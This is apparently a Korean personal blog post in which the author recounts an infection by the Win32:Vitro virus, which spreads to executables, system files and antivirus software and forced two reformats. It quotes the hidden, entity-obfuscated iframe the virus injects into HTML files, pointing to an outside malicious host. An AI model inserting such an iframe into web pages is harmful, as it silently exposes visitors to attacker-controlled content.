Win32:Vitro 바이러스...

이녀석 무지막자한 놈이다.

한번 걸리면 거의 치료를 포기해야 할듯 하다.

감염이 되면 이후에 실행되는 모든 exe 파일이 감염이 된다.
즉 감염이 되면 메모리에 상주하고 있다가 메모리에 올라오는 모든 프로세서를 감염시켜 버린다.

감염이 되고 윈도우를 재부팅 하면 윈도우 시스템 파일이 몽땅 감염되 버리는 멋진 상황이 연출된다.

그러면 최악의 경우 바이러스백신 프로그램까지 감염이 된다.
어짜피 백신도 고칠순 없다. 그냥 예전 파일로 되돌리는 수 밖에...

정말 중요한 데이터가 없으면 그냥 포맷해 버리는게 맘 편하다.
혹시 다른 파티션의 프로그램은 안 지웠다면 꼭 바이러스로 검사해보길 바란다.


그리고 모든 .html 파일에
다음과 같은 걸 집어넣는다.
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>

물론 백신프로그램이 바이러스라고 걸러낸다. 저 라인만 지워주면 바이러스라고 하진 않는다.

하지만 exe 파일의 경우 치료법이 없을듯 하다.

정확히 어떤 짓을 하는지 모르지만 exe 파일이 감염되면 원래 자신의 역할은 확실히 수행을 해준다.

이놈 때문에 한달에 무려 2번이나 포맷해버렸다...

일단 샘플을 들고 있으니... 가상머신에서 비교나 해봐야겠다.

+ Recent posts